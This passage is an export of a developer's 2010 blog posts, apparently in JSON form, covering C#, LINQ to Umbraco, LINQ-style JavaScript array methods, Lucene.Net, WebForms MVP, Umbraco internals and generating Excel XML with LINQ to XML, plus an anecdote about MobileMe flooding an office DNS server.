The problem wasn’t our internet, in fact the problem could be blamed on one individual, yep you guessed it, me :(.\nTurns out that when I wasn’t on the network everything was fine, everyone could use the web, chat on msn, do what ever they wanted, but as soon as I plugged in, BAM, the internet died. So after a bit of detective work (mostly by Shannon) it was concluded that my computer was doing something nasty to the network. So we cracked out a copy of Wireshark and decided to do some detective work with packet sniffing.\nImmediately it was obvious what was happening, I was flooding our DNS server with requests, requests that the DNS server was returned as invalid. The requests kept looking for a URL along the lines of tcp.members.mac.com and after a bit of searching it turned out that that URL is related to the Apple MobileMe service. So Shan asked if I was signed up with MobileMe, to which I responded “I don’t believe so”, but it turned out again I was wrong, I had signed up to MobileMe, but it must have been when I first got my iPhone. When you get an iPhone you can sign up with a 60 day trail, something I must have done (hey, it said I was signed in, guess I signed up at some point :P). After doing some quick math I concluded that it was ~60 days since I got my iPhone when we first started having internet problems (the last working week last year).\nI instantly signed out of MobileMe, and low and behold the DNS flooding stopped happening!\nThank you Apple for producing a service which is capable of bringing down an office network, you’ve just made sure I strongly consider not purchasing MobileMe in the future!\nOh and I’m never going to live this down at work, Shan isn’t a fan of Apple so this is just adding fuel to the fire!\n", "id": "2010-04-25-oh-woe-is-mobile-me" }, { "title": "Why does this code work?", "url": "https://www.aaron-powell.com/posts/2010-04-25-why-does-this-code-work/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ ".net", "c#", "operator-overload" ], "description": "A neat trick with operators in .NET", "content": "In the discussion on the Umbraco forum about using LINQ to Umbraco I posted a short code snippet of something we write fairly frequently at TheFARM using our version of LINQ with Umbraco.\nI thought I’d post the challenge to my trusty followers, for them to see if they know why the code works. First off the code:\nIEnumerable<XElement> nodes = UmbXmlLinqExtensions.GetNodeByXpath(...); IEnumerable<IUmbracoPage> pages = nodes.Select(n =>(IUmbracoPage)(UmbracoPage)n); What the XPath being evaluated isn’t important, what is important is you’ll notice that we have a collection of System.Xml.Linq.XElement’s, but then it’s directly casting each XElement to IUmbracoPage.\nHere’s the skeleton for the class and interface:\npublic interface IUmbracoPage { ... } public class UmbracoPage : IUmbracoPage { ... } Again the body of the interface isn’t important, what is important is that the class only inherits from the interface, it does not inherit from XElement.\n###Why does this work###\nWell the answer is actually very simple, and it’s a really handy feature of the C# language, explicit operators.\nExplicit operators allow you to define explicit casting between types. 
So the code that was missing from my original post was this:\npublic static explicit operator UmbracoPage(XElement x) { return new UmbracoPage(x); } What I’ve done here is defined how the compiler is to treat a casting of an XElement to an instance of UmbracoPage, and since UmbracoPage inherits IUmbracoPage there is already a defined casting to it.\nInside the body of my explicit operator I can do anything I desire, here I’m just returning a new instance, passing the XElement to the constructor.\nI find it really quite elegant, and that it reduces code smell quite nicely.\nBut explicit operators also have a buddy, in the form of implicit operators (which was the close-but-no-cigar answer). These work by the type being defined by the assignment target, eg:\nUmbracoPage page = xElement; I’m personally not a fan of implicit operators though, I find them less obvious when you’re reading code.\nSo there you have it, a slightly obscure language feature to play with!\n", "id": "2010-04-25-why-does-this-code-work" }, { "title": "Why I'm not a fan of XSLT", "url": "https://www.aaron-powell.com/posts/2010-04-25-why-im-not-a-fan-of-xslt/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "xslt", "linq-to-umbraco" ], "description": "XSLT has a place in development and Umbraco, here's why I think a lot of people miss understand its place", "content": "When I first joined the Umbraco team with the goal of bringing LINQ to Umbraco to the core framework there was some excitement and quite a bit of the early excitement was from Umbraco MVP Warren Buckley. And with the recent beta release the focus has come back onto LINQ to Umbraco, myself and XSLT.\nWhile preparing to write this post I was tossing up with the name. Although I’ve entitled it “Why I’m not a fan of XSLT” it would have been just as apt to name it “Why write LINQ to Umbraco?”.\nAs you read through this post I was you to keep in mind that I’m not someone who is really that good at XPath and XSLT. In fact, my dislike for XSLT is why I wrote LINQ to Umbraco!\nBut why, being an Umbraco user, don’t i like XSLT? After all, it’s a fairly core part of Umbraco!\n##Compile time checking##\nThat’s right, I’m very much a developer, and very much a compiler-driven developer. Runtime errors really are the worst to try and debug, and that’s what you really get with XPath. XPath is evaluated at runtime (yes, that’s a bit generalized :P), so if you have something wrong in your syntax you wont find it immediately.\nCompare that to .NET code, it’s very hard to write .NET code which wont compile. True that you can still get runtime errors, but they are a lot harder to achieve in the scenario’s we’re looking at for LINQ to Umbraco vs XSLT.\n##Strong typing##\nAgain, another example of me being very much a developer, I would much rather look at an object with properties which knows of the type of the data.\nIf you’re not careful you can mistake the type and then you, again, have a runtime error :P. The .NET compiler wont let you assign a string to an int.\n#Readability##\nThis one will cause a bit of a stir, but I simply don’t find XPath & XSLT readable. Take these two examples:\n//node[nodeTypeAlias='home_page']/node[nodeTypeAlias='contact_us' nodeName='Contact Aaron'] ctx.HomePages.ContactUs.Where(c => c.Name == "Contact Aaron"); My example is very basic, but if you look into a more complex XSLT file (such as many which exists in Warrens CWS package). 
In fact, in the unit tests for LINQ to Umbraco there is a replication of a few of them (have a look in the source on Codeplex if you want to see them).\nA very important component of code for me is readability. When debugging, especially if the code isn’t yours to begin with, readability is a vital component. You don’t want to have to waste time trying to understand what’s going on in the code before trying to solve it. And if you can’t work out the code properly then there’s a chance you’ll just make the problem worse.\n##API Design##\nAgain I’ll probably cause a stir with this one again but it’s another thing that is very dear to my heart. I am a strong believer in proper API design, and if it’s done wrong then it can make your life hell in the future.\nI also like abstractions. LINQ to Umbraco is an example of that… provider model! Here at The FARM we’ve got a great level of abstraction which we use, we don’t pass classes around, only interfaces, which means that your UI is dumb, really really dumb. There isn’t any business logic contained there, and there’s nothing more complex than a method call.\nBut too often when I see an XSLT it’s containing more than just UI code. And this isn’t really a fault of XSLT, but of how it’s perceived. When you look at an ASPX/ ASCX people have a different mindset, you don’t put anything really in the front-end file other than the markup as there is a CS file associated which you think to put the other complex code into. But with an XSLT there isn’t another file, so everything ends up there.\nThen it becomes too complex to try and achieve with XSLT cough variable incrementing cough so an XSLT extension is written. And I’ve seen some really scary XSLT extensions, which allow you to do things which just make me want to cringe.\nXSLT should only be concerned with formatting data to output markup…\n##XSLT’s produce better markup##\nAnyone who says that is ill-informed. If you don’t think you can write valid, XHTML markup with ASP.NET Web Forms then you’re not doing it right!\nControl Adapters, Repeaters, List View, inline script blocks, etc can all be used to produce what ever markup you so desire. And it doesn’t take much effort to produce good markup with ASP.NET. In fact, with Visual Studio 2008 it’s really hard to use the standard editor to produce crappy markup.\nThe biggest problem is ID’s of elements, but you only have that problem if the element is:\nInside a naming container Set to runat=“server” And you should only be setting runat=“server” on elements you need server-side access to, but that’s a topic for another night.\n##Conclusion##\nSo this brings me to the end of another post. Hopefully it’s been enlightening and I haven’t upset too many people :P\n", "id": "2010-04-25-why-im-not-a-fan-of-xslt" }, { "title": "Working with dates and LINQ to SQL", "url": "https://www.aaron-powell.com/posts/2010-04-25-working-with-dates-and-linq-to-sql/", "date": "Sun, 25 Apr 2010 00:00:00 +0000", "tags": [ "linq-to-sql", "c#", "datetime", "sql" ], "description": "DateTime.MinValue doesn't match the SQL server minimum date. So how do you deal with it using LINQ to SQL?", "content": "Something I’ve heard developers complain about on numerous occasion is that DateTime comparisons between SQL and .NET is a real pain. 
Often you need to do a comparison of the date against either a Min or Max value.\nWith raw .NET this is really quite easy, you can just use the DateTime struct and grab DateTime.MinValue or DateTime.MaxValue.\nBut if you’ve ever done this:\nvar res = from item in Collection where item.CreatedDate != DateTime.MinValue select item; You’ll get the following exception thrown:\nSqlTypeException: SqlDateTime overflow. Must be between 1/1/1753 12:00:00 AM and 12/31/9999 11:59:59 PM. The problem is that DateTime.MinValue is actually 01/01/0001 12:00:00 AM.\nSo I’ve quite often seen hacks where a new date is being created which represents the minimum value SQL Server accepts, and all kinds of weird things, but that’s all redundant. The comparison value is built into the .NET framework.\nAll you need is the System.Data.SqlTypes.SqlDateTime structure. This exposes two fields, MinValue and MaxValue. All you need to do is access the Value property of these and pass it into your LINQ statement. The date will be parsed correctly as a SQL valid date and you can do your comparisons!\nSo please, stop with the silly workarounds for date comparisons with SQL and .NET :P\n", "id": "2010-04-25-working-with-dates-and-linq-to-sql" }, { "title": "LINQ in JavaScript", "url": "https://www.aaron-powell.com/posts/2010-04-24-linq-in-javascript/", "date": "Sat, 24 Apr 2010 00:00:00 +0000", "tags": [ "linq", "javascript" ], "description": "LINQ is just a pattern, this shows you how to produce it in JavaScript", "content": "Let me start by saying that I am aware that there is a LINQ to JavaScript project on Codeplex but this was done by me as more of an academic exercise/challenge.\nSo while I’ve been working on LINQ to Umbraco I’ve also been spending some time doing AJAX-y stuff, and I have been having a lot of fun playing with JavaScript. And then one day I was thinking about how I would go about manipulating a collection entirely client-side, and realised that loops are ultimately the only way to go about it. Well that’s all well and good, but if you want to do a lot of collection manipulation there’s not a really good way to go about it (or at least, a really good way from a .NET developer point of view :P).\nAnd after all, what is LINQ? LINQ really is just a way in which you can do pseudo-dynamic programming in a static language (as Lambda is heavily derived from dynamic languages). So shouldn’t it be possible to do in a dynamic language?\nSo I whipped out my copy of Visual Studio and got coding away, and here’s the end result, a line of code entirely in JavaScript:\narray.where(function(item) { return item.property === "something"; }) .orderBy() .groupBy(function(item) { return item.value; }); Lovely, isn’t it?\nBut before I get into some of the stuff I do, let me explain why my approach is different to the JSLINQ project on Codeplex. Now I mean no disrespect to Chris, but there are a few things which I don’t like about his approach, and which kind of go against the LINQ pattern.\nFirst off JSLINQ requires that you create a new object which you pass the array into. I can see some reasons for this, better intellisense, stricter control over collection manipulation (the collection becomes read-only) but I think that the primary reason must be to better support object-notation arrays (you know, [] arrays). When you define an array using object notation it’s not really an array (typeof [] === "object"). 
This is a problem if you want to LINQify it; you need to pass it to some other type.\nThe second issue I have with it is the naming. All the methods are named with Pascal Casing, which is the standard in .NET land, but every JavaScript library I’ve ever used (and as is standard) uses Camel Casing for methods. Sure Pascal keeps its relationship to .NET valid, but when trying to appeal to JavaScript developers it’s just a bit foreign.\nLastly I’m a bit bothered by the lack of argument checking. This may be because I’m a very defensive programmer, but I don’t like to allow developers to shoot themselves in the foot. If a parameter should be a function, then the parameter should be checked as a function. If a parameter is required, it should be checked as such.\nThis is more of a personal preference than a real design flaw though.\n##My Approach##\nNow that I’ve talked about what I don’t like with the JSLINQ project I think it’s only fair to talk about my approach. I’ve gone with a more traditional LINQ approach and added extensions to an existing type, in this case the Array type, via Array.prototype. This means it is closer to the extension-method format of IEnumerable from .NET, you just need to add in a namespace (aka, include the JavaScript file), but it does have a problem of allowing the collection to be modified (which does have pros and cons).\nI have also kept with standard JavaScript programming and Camel Cased the method names.\nThe following operators are supported:\nWhere Order By (inc descending) First/orDefault Single/orDefault Last/orDefault Select GroupBy IndexOf By and large they work under the hood with for loops, taking a method (aka a Lambda function) and using it. As I said I’m a defensive programmer so there is a lot of type-checking against the arguments and the return types of methods (for example, ensuring that the Where lambda returns a boolean).\nGroupBy is my most proud operator, as it turned out to be a bit harder than I had thought. 
But it does return a collection which is also a pseudo-dictionary which can be iterated through.\nI would provide the full source code but there seems to be a problem with the current Umbraco instance running my blog which won’t let me upload media items!\nBut here’s the Where and GroupBy operators:\nArray.prototype.where = function(fn) { /// Filters the array /// Filtering function /// if (typeof (fn) !== typeof (Function)) throw Error.argumentType("fn", typeof (fn), typeof (Function), "where takes a function to filter on"); var coll = new Array(); for (var i = 0; i < this.length; i++) { var ret = fn(this[i]); if (typeof (ret) !== "boolean") throw Error.argumentType("fn", typeof (ret), typeof (Boolean), "function provided to where must return bool"); else if (ret) coll.push(this[i]); } return coll; } Array.prototype.groupBy = function(fn) { /// if (!fn || typeof (fn) !== typeof (Function)) { throw Error.argumentType("fn", typeof (fn), typeof (Function), "groupBy takes a function to filter on"); } var ret = new Array(); for (var i = 0; i < this.length; i++) { var key = fn(this[i]); var keyNode = ret.singleOrDefault(function(item) { return item.key === key; }); if (!keyNode) { ret[ret.length] = { "key": key, "items": new Array() }; ret[ret.length - 1].items.push(this[i]); } else { ret[ret.indexOf(keyNode)].items.push(this[i]); } } return ret; } ##The next stage##\nI’ve done a few tweaks within LINQ in JavaScript, and I’ve added a couple of new operators, Skip, SkipWhile and Take, all providing the same functionality that their .NET counterparts provide.\nLet’s have a look at the way some of the code works, we’ll look at the where method:\nArray.prototype.where = function(fn) { if (typeof (fn) !== typeof (Function)) throw Error.argumentType("fn", typeof (fn), typeof (Function), "where takes a function to filter on"); var coll = new Array(); for (var i = 0; i < this.length; i++) { var ret = fn(this[i]); if (typeof (ret) !== "boolean") throw Error.argumentType("fn", typeof (ret), typeof (Boolean), "function provided to where must return bool"); else if (ret) coll.push(this[i]); } return coll; } First off you’ll notice that I expect a function to be passed into the method, otherwise how would you apply a where?! As you’ll notice I’m doing a lot of type checking as well, the parameter for Where needs to be a function, so I explicitly check that it is.\nThen it’s really just a simple iterator that is used, pushing each item into a new collection where the provided function returns a boolean value of true. Again you’ll notice type checking, this time of the return value of the function. Because JavaScript isn’t compiled, and there is no type checking, I have to do it manually (this means that I’m doing a traditional LINQ API, not one where you can return anything you like, ala this post). Not a big problem, but it does add a little overhead.\nSure you can remove it but then it kind-of defeats what I’m trying to achieve, which is a very type-safe API.\nUltimately LINQ in JavaScript is nothing more than a thought-experiment project. It shows that you can quite easily have a client side query language using JavaScript and functional programming.\nBut I don’t recommend that anyone actually use it. If you’re using a client-side query API such as this (or any of the other LINQ implementations for JavaScript) you’re doing it wrong. Particularly operators like where, skip, take and even select. 
These operators are designed to lower/ change the data volume you are working with, which on the client side is not a good idea. It means that you’ve returned too much data from the server! I see the only real useful reason for this (other than just wanting to prove it can be done) is to manipulate a DOM structure, say client-side reordering of a table.\nECMAScript 5 LINQ in JavaScript supports the new Array methods which are part of ECMAScript 5, you can read more about it in the announcement post.\n##Source code\nI’ve pushed the source code for the LINQ in JavaScript project up to bitbucket. If you’re interested in having a play with it you can grab it from there.\nNuGet I have created a NuGet package for this as well. You can get it here.\n", "id": "2010-04-24-linq-in-javascript" }, { "title": "DDD Melbourne & Umbraco", "url": "https://www.aaron-powell.com/posts/2010-04-22-dddmelbourne-umbraco/", "date": "Thu, 22 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "dddmelbourne" ], "description": "DDD Melbourne is on during May and I'll be there to speak about Umbraco", "content": "A few weeks ago I was noticing a lot of tweets from the people I follow about an upcoming event in Melbourne called Developer Developer Developer. Interested I delved into it and found that I really liked what they had to offer. It’s a free conference on the Microsoft stack which is community driven, meaning that anyone can propose a topic and the community would vote for what they wanted to see.\nSo I decided to chuck my hat into the ring and propose a session, and to my horror, I mean surprise, I’ve been accepted!\nWell I’ve booked a flight, still trying to work out where I’m staying and will be around on Friday night in Melbourne if anyone is up for a pre-conference meet and drink.\nDon’t forget the NerdDinner on Saturday night too.\nSecrets of an Umbraco Ninja This is the session I’ll be presenting at DDD Melbourne. I’ll be looking at how you can use Umbraco beyond traditional content management. I’ll be looking at integration with Flash and Silverlight for rich content, how you can get the most out of performance with Examine and dealing with unpublished content.\n####Slide decks and code samples\nWell DDD Melbourne is done and dusted, it was a good time. Really appreciate the work that the guys did to organise it, and very glad to have been given the opportunity to present.\nThanks to all those who attended my session, hopefully something was learnt from it ;).\nAs promised here is the slide deck and code samples:\nSlides (including WebForms MVP stuff I didn’t get to :P) Code (DB not included) ####Footnote\nI’m currently helping out Lewis Benge with DDD Sydney, more information on that will come soon.\n", "id": "2010-04-22-dddmelbourne-umbraco" }, { "title": "An overview of Lucene.Net", "url": "https://www.aaron-powell.com/posts/2010-04-14-lucene-net-overview/", "date": "Wed, 14 Apr 2010 00:00:00 +0000", "tags": [ "lucene.net", "c#", ".net", "examine", "umbraco-examine" ], "description": "Overview and table-of-contents for Lucene.Net articles", "content": "Please note, this document is a work in progress and will be expanded over time\nTable of Contents Overview Analyzer Documents Building an application with Lucene.Net What is Lucene.Net?Although you can read the official word on the Lucene.Net project site I’ll do an abridged version here, explaining it in the way that I understand it.\nLucene.Net is an exact port of the Java Lucene search API, which comprises of indexers, analyzers and searchers. 
There are very few differences between the two frameworks, you’re actually able to read the Java API documentation (which is really all you have to go on) and it is going to match up with the functionality. The only real differences are that the namespacing in the .NET API is .NET-ish, and some of the API has been re-cased to match a more .NET style.\nLucene takes string data which is then passed into an analyzer and serialized into an index file. Lucene works with strings, and it only understands strings. How it understands strings is defined by the analyzer which you are using.\nOnce you have your data into an index you then get it out via a searcher. A searcher takes a query which uses a construct similar to other search engines (here’s the query syntax documentation). Documents are then returned from Lucene, which reference the point in the index file where a result is located, and then can be deserialized into a set of fields which represents the original string data you passed in.\nWhat is Lucene.Net not? In a word, smart. Lucene has no smarts about it, it doesn’t understand file types, it doesn’t really understand dates or numbers. I’m often asked “Can Lucene index x?”, the simple answer is “No”, but really the answer is “Yes”. If you’re able to represent it as a string you can have Lucene handle it. This poses some interesting ideas, say you want to index an Office document, well if that’s an OpenXML document then it’s relatively easy, the OpenXML API is quite good in regard to extracting text.\nUnderstanding Lucene terminology To not get completely lost with Lucene you need to understand the terms which it uses.\nDocument This is a record within the Lucene index. It is comprised of fields. Whenever you’re working with data from the index you’re working with a Document Field A single piece of data associated with a document. A field may or may not be indexed, depending on how you’re inserting it into your index, and this defines how you can interact with it, and how Lucene will treat it Term A part of a Lucene query. A Term is comprised of a left and a right part, looking like this: Field:Query. The left part is the name of the field you’re scoring against, the right part is the data to use when scoring Score Lucene generates results determined by how well they score against a search query. Scores are generated by using the search query and comparing the Document’s Fields to it. Analyzer An analyzer defines how the indexer or searcher will handle the data. There are many different analyzers in Lucene and each handle indexing and searching in subtly different ways Indexer The Indexer is what is responsible for serializing a Document and storing it within the index file. Searcher The Searcher will take a Query and retrieve a list of Documents out of a Lucene index. Query A Query is comprised of a group of Terms and Boolean Operations which are passed into a searcher to retrieve Documents out of the Lucene index. 
The Query is also used to determine the score of a Document within the record set Boolean Operation AND, OR, NOT all comprise Boolean Operations which can affect how a Term is handled within a Query ", "id": "2010-04-14-lucene-net-overview" }, { "title": "ASP.NET WebForms Model-View-Presenter Contrib Project", "url": "https://www.aaron-powell.com/posts/2010-04-12-webforms-mvp-contrib/", "date": "Mon, 12 Apr 2010 00:00:00 +0000", "tags": [ "asp.net", "webforms-mvp", "webforms-mvp-contrib" ], "description": "An overview of WebForms MVP Contrib project", "content": "Overview I’m a big fan of ASP.NET WebForms Model-View-Presenter (MVP) which is produced by Tatham Oddie and Damien Edwards. It’s a really great way to achieve testable webforms development, along with doing good design with decoupled webforms design.\nAs an Umbraco developer you’re somewhat limited with your options for testable development. You can use ASP.NET MVC, but it doesn’t integrate quite the same way, it’s not really possible drop them in as macros.\nYou could look at an isolation framework like Typemock to completely mock out the HttpContext and everything else, but then you’re potentially creating too many fake expectations around how everything is going to work.\nThis is where WebForms MVP can come in, it’s designed to fill this gap. I’ve used it on several Umbraco builds, and in fact I ran a webinar (screen cast here) and hopefully I’ll be talking about it in a formal capacity at CodeGarden10 this year.\nI’ve been using MVP for WebForms for a number of years now, starting with home-grown frameworks so I was a bit familiar with what I liked with a framework. But because WebForms MVP is a framework it’s not really meant to provide many out of the box components.\nWhile driving to Canberra for Christmas 2009 I was thinking about how I was currently implementing WebForms MVP and realising that I was constantly writing the same set of views and presenters and though that others who are using this are probably doing the same thing. There’s a number of things that seem very logical to need, such as validation, submit/ cancel eventing, etc. So I decided that it would be a great idea if theres common components were available.\nSo once I’d arrived at my destination I grabbed out my iPhone and started writing the initial concepts for what is now WebForms MVP Contrib.\nWhy As I stated the goal of this project was to give a bunch of defaults for people who are working with WebForms MVP. I also liked the extensibility of the project, the ability to change out the PresenterBinder, which is essentially the IoC container which is used internally of WebForms MVP. Now there’s nothing wrong with the built in PresenterBinder, but I like options, so I set about producing a Ninject Binder, meaning that it’s possible to use Ninject for all your IoC needs within WebForms MVP.\nThe other major goal was to make for more service-orientated presenters than the examples which are available as part of the source package. Service-orientated design is something we practice quite extensively at TheFARM and makes it very easy to abstract away data interactions from any business layer of your application. 
This in turn makes testing even easier.\nWhat’s available Although “full” documentation is available up on our project codeplex page (and I really should put it on the official site…) currently theres 2 available PresenterBinders, we support Ninject and StructureMap (thanks to Lewis Benge).\nAdditionally there’s a handful of standard views, and view extensions, which are essentially interfaces which have some grouped functionality which is useful to implement in some instances.\nCurrently we’re sitting at CTP6 as the primary release, which uses the CTP6 release of WebForms MVP. With the recent check-in’s to support StructureMap we’ll be looking to do a CTP7 release to bring us in line with the current stable of WebForms MVP, but I’m more handing out for the exposure of the discovery strategy to see what funky stuff we can do with that.\nHelping out As you can probably tell from the check-in’s there hasn’t been a lot from me recently on this project. It’s by no means dead, but as I commit on several other projects as well my time can be spread pretty thin. If you have any ideas or any features you’d like to see please get in contact with me. You can find my contact information on the About page of this site, or additionally you can drop us a message on the codeplex site.\n", "id": "2010-04-12-webforms-mvp-contrib" }, { "title": "Umbraco DataType Design", "url": "https://www.aaron-powell.com/posts/2010-04-11-umbraco-data-type-design/", "date": "Sun, 11 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "data-type" ], "description": "Looking into how the DataTypes are designed for Umbraco", "content": "DataType’s in Umbraco 4.x I’ve often seem people wondering why performances is so terrible when creating Documents, particularly lots of Documents from the Umbraco API. There is a good reason for this, the design of the DataType allows anyone to be able to implement them to do almost anything.\nThe standard way to use a DataType is to write to the Umbraco database, but you don’t have to do it that way, you can write to an XML file, call a web service or actually have no data saving.\nBecause of this it’s up the responsibility of the DataType creator to do the CRUD operations, it’s not possible to have Umbraco have some kind of a global save operation (because what if there wasn’t a save!).\nThis does mean that there’s the probability for lots of database interaction when you perform CRUD operations, but it does mean that DataTypes are infinitely flexible.\nBecause of this we were able to produce TheFARM Media Link Checker package for Umbraco. And I’d also hasten a guess that this flexibility also allowed the Google Analytics for Umbraco package to now allow lookups from the content item.\n", "id": "2010-04-11-umbraco-data-type-design" }, { "title": "Umbraco Event Improvements", "url": "https://www.aaron-powell.com/posts/2010-04-11-umbraco-event-improvments/", "date": "Sun, 11 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "eventing" ], "description": "A look at the events changes in Umbraco versions", "content": "As I mentioned in a previous article there’s a problem with the 4.0 eventing. 
But not everything is bad news, there’s a light at the end of the tunnel!\nBackground If you’re wanting to learn more about why this is the way it is then I suggest you have a look at this article about data types.\nThe crux of it really comes down to how Data Types are designed.\nUmbraco 4.1 changes When I first noticed the problems I outlined in the great Umbraco API misconception I decided to look into what I could do about it, but still maintain backwards compatibility with Umbraco 4.0.\nAt the very least I changed Umbraco 4.1 to raise the BeforeSave event before any saving occurs! It only works when you’re using the Document.BeforeSave event, not the other objects which inherit from Content (where the event originates from). Also, this change only happens when you’re using the CMS front-end.\nIf you’re using the Document API yourself to create documents I’ve changed the constructor Document(int id, bool optimizedMode) to use deferred saving. This means the save method does actually do the saving!\nI did not change anything to reduce the number of SQL calls, it just performs the saving after the BeforeSave event fires from within the Save method.\nIn addition to deferred saving I’ve also added an indexer to the Document object so you can do:\nvar doc = new Document(1234, true); var something = (string)doc["MyProperty"]; Personally I think this is much more obvious than the getProperty operation, and it’s how I’d expect to interact with them in the future.\nInternally the indexer wraps the getProperty method so you can use it in any instance. But when it is used with optimized mode it will also cache the properties! Every time you call getProperty you go into the database (as far as I could gather). When you use the indexer and optimized mode the property accessor looks into an internal cache, sees if it’s there and if it isn’t gets it from the database, adds it to the cache and saves it for later. This is how the deferred saving works, it looks into the cache to set the property values.\nHopefully this makes the eventing in 4.1 a lot more useful if you need to control the flow better.\n", "id": "2010-04-11-umbraco-event-improvments" }, { "title": "Umbraco AUSPAC January 2010", "url": "https://www.aaron-powell.com/posts/2010-04-09-umbraco-auspac-january-2010/", "date": "Fri, 09 Apr 2010 00:00:00 +0000", "tags": [ "umbraco", "user-group" ], "description": "", "content": "First off I’d like to say thanks to all who attended tonight’s Umbraco webinar, I think we had mid-20s for most of the session, really excited by the volume.\nAnyone who hasn’t already filled out the post-session review please do so, it’ll help me make it more awesome next time ;).\nAs promised, here are the resources from tonight’s session:\nSlide Deck .NET project For those who are interested I did record tonight’s session, but it appears that it stopped recording about 20 minutes before the end. 
The majority of the video can be found here for your viewing pleasure.\n", "id": "2010-04-09-umbraco-auspac-january-2010" }, { "title": "Are Extension Methods Really Evil?", "url": "https://www.aaron-powell.com/posts/2010-04-08-are-extension-methods-really-evil/", "date": "Thu, 08 Apr 2010 00:00:00 +0000", "tags": [ "c#", ".net", "extension-methods" ], "description": "", "content": "Ruben (of Umbraco fame) recently wrote a post entitled Extension Methods: Silent static slaves which was in response to a comment I’d left on a previous post about static classes and static method being evil.\nIf you haven’t read Ruben post then I suggest you do before continue on with mine as a lot of what I’ll be saying is in counter argument to him (including the comments).\nDone? Good, continue on!\nRuben has produced a demo which is great for illistrating his point, but is it an example of good design turning bad or just bad design from the start?\nThe first thing I want to look at is that his extension methods are on the interface and implementation class. This is bad design to start with, but it’s not just bad design if you’re using extension methods, this could manifest itself as bad design if you did it as helper methods in a separate class, eg:\nclass Helpers { public static int CalculateShoeCount(Animal animal) { //do processing } public static int CalculateShoeCount(Monkey animal) { //do processing } } So this would fall into the same trap if we don’t re-cast Animal to Monkey before calling the helper.\nBut does this prove Ruben’s initial point, that static’s are just plain evil? Well no, design isn’t possible without statics. If you try and design without statics you end up with nothing but instance memebers. If that’s the case where do I find the current method int.TryParse, does this become 0.TryParse?\nRuben’s demo is an example of bad design producing worse design. In good design the CalculateShoeCount would be a member of the Animal interface, particularly since the implementation changes per interface implementation type.\nSo how can we use extension methods to produce good design? Well first you really need to understand what an extension method is. As Ruben quite correctly pointed out an extension is just syntactic suger and extension methods should be treated as such. Developers need to understand that extension methods are only designed to provide functionality to a classes public instance members; they are stateless. (This is why I don’t understand why so many people of Stack Overflow want extension properties added to the compiler, this is where people are missing the point of the extension concept) And if you’re expecting a stateful nature from the extension methods then you’ve missed their goal.\nLets look at some good examples of using extension methods. Here’s a fav of mine for Umbraco:\npublic static string Url(this Node node) { return umbraco.library.NiceUrl(node.Id); } (Hey look, a static calling a static ;)).\nOr how about this one:\npublic static IEnumerable<ListItem> SelectedItems(this ListControl ctrl) { return ctrl.Items.Cast<ListItem>().Where(item => item.Selected); } Now we’re using an extension method with an extension method.\nBut both of these examples are using actual class implementations, not interfaces, does that make a difference? Yes, and a big one. When you are putting extensions on an interface there needs to be no possibility of confusion about what the extensions are for. 
And if you are also providing an extension of an implementation of the class they need to be in separate namespaces. If they aren’t, you will end up with what Ruben shows, misrepresentation of the methods abilities.\nIQueryable is a perfect example of how to use extension methods on top of an interface. If you have a look at the construct of the interface there’s actually no constructs within it! This means that “all” the functionality is provided by extension methods, allowing anyone to write their own extensions. If I was to not include the namespace System.Linq I can then write my own query extensions, eg a Where that does return a bool, or negate operators which I don’t want to support.\nSo in my opinion extension methdos are no more evil than anything else in programming; they can easily be abused and misused, but find something that it’d not possible to misuse to prove bad design.\n", "id": "2010-04-08-are-extension-methods-really-evil" }, { "title": "LINQ to XML to... Excel?", "url": "https://www.aaron-powell.com/posts/2010-04-08-linq-to-xml-to-excel/", "date": "Thu, 08 Apr 2010 00:00:00 +0000", "tags": [ "linq", "linq-to-xml", "excel", "c#" ], "description": "Easily generating Excel documents using LINQ to XML", "content": "The other day one of the guys I work with was trying to work out the best way to generate an Excel document from .NET as the client had some wierd requirements around how the numerical data needed to be formatted (4 decimal places, but Excel treats a CSV to only show 2).\nThe next day my boss came across a link to a demo of how to use LINQ to XML to generate a XML file using the Excel schema sets which allow for direct opening in Excel. One problem with the demo, it was using VB 9, and anyone who’s seen VB 9 will know it has a really awesome way of handling XML literals in the IDE. This isn’t a problem if you’re coding in VB 9, but if you’re in C# it can be.\nThe VB 9 video can be found here: http://msdn.microsoft.com/en-us/vbasic/bb927708.aspx\nI recommend it be watched before progressing as it’ll make a lot more sense against the following post. It’ll also cover how to create the XML file, which I’m going to presume is already done.\nIn the beginning Because C# doesn’t have a nice way to handle XML literals like VB 9 does we’re going to have to do a lot of manual coding of XML, additionally we need to ensure that the appropriate namespaces are used on the appropriate nodes.\nThe Excel XML using 4 distinct namespaces, in 5 declarations (yes, I’ll get to that shortly) so we’ll start off by defining them like so:\nXNamespace mainNamespace = XNamespace.Get("urn:schemas-microsoft-com:office:spreadsheet"); XNamespace o = XNamespace.Get("urn:schemas-microsoft-com:office:office"); XNamespace x = XNamespace.Get("urn:schemas-microsoft-com:office:excel"); XNamespace ss = XNamespace.Get("urn:schemas-microsoft-com:office:spreadsheet"); XNamespace html = XNamespace.Get("http://www.w3.org/TR/REC-html40"); Notice how the ‘main namespace’ and ‘ss’ are exactly the same, well this is how they are handled within the XML document. 
The primary namespace for the file is urn:schemas-microsoft-com:office:spreadsheet but in some locations it’s also used as a prefix.\nFor this demo I’m going to be using the obligatory Northwind database and I’m going to just have a simple query against the customers table like so:\nvar dataToShow = from c in ctx.Customers select new { CustomerName = c.ContactName, OrderCount = c.Orders.Count(), Address = c.Address }; Now we have to start building our XML, the root element is named Workbook and then we have the following child groups:\nDocumentProperties ExcelWorkbook Styles Worksheet WorksheetOptions Each with varying child properties.\nFirst thing we need to do is set up our XElement and apply the namespaces, like so:\nXElement workbook = new XElement(mainNamespace + "Workbook", new XAttribute(XNamespace.Xmlns + "html", html), CreateNamespaceAtt(XName.Get("ss", "http://www.w3.org/2000/xmlns/"), ss), CreateNamespaceAtt(XName.Get("o", "http://www.w3.org/2000/xmlns/"),o), CreateNamespaceAtt(XName.Get("x", "http://www.w3.org/2000/xmlns/"), x), CreateNamespaceAtt(mainNamespace), I’m using a helper method to create the namespace attribute (which you’ll be able to find in the attached source), but notice how the “main” namespace is the last one we attach; if we don’t do it this way we’ll end up with the XElement detecting the same namespace and only adding it once. Also, you need to ensure that you’re prefixing the right namespace to the XElement tag!\nDocumentProperties and ExcelWorkbook These two node groups 